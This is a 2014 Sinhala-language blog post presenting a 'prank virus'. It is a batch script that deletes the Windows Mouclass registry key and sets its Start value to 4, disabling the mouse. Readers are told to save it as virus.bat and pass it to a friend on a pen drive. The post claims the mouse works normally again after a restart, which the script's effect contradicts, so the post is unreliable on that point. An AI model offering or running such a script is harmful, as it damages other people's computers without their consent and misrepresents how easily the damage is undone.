_______________________________________________________________

Dec 7, 2014

යාලුවගේ මවුස් එකකට කෙලවමුද..? [DISABLE MOUSE]

     ඔන්න ඉතිං ආතල් එකේ ඉන්න ගමන් යාලුවෙකුට ඇඩෙන්ඩ පොඩි වැඩක් කරමුද . .? හැබැයි ඉී ස්ටාට් පාරක දැම්මම ආයි නියමට වැඩ. මේකත් පොඩි  simple VIRUS එකක් තමයි . කරලම බලන්ඩකෝ . . පට්ට වැඩක්. මේකටත් Notepad එක තමයි භාවිතා කරන්ඩ තියෙන්නේ  . සුලු දෙයක්. එහෙනම් වැඩේට බහිමුකෝ. එහෙනම් පහතින් තියෙන ආකාරයට කරගෙන යන්ඩකෝ . . . . .
Step1:  Notepad එක විවෘත කරගෙන පහත කේතය එයට කොපි කරගන්ඩ.
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
Step2: දැන් එම ෆයිල් එක  virus.bat ලෙස සේව් කරගන්ඩ.

Step3: හරිනේ ..  එන්න දැන් සේව් කරපු තැන වයිරස් එක හැදිලා ඇති. දැන් ඉතිං යාල්වගේ පෙන් එකට වගේ පටවලා යවන්ඩ තියෙන්නේ.. හැබැයි ගුටි කන්ඩ වුනොත් මම දන්නෑ  . .  හොදද?.                                         
SriLankaHosting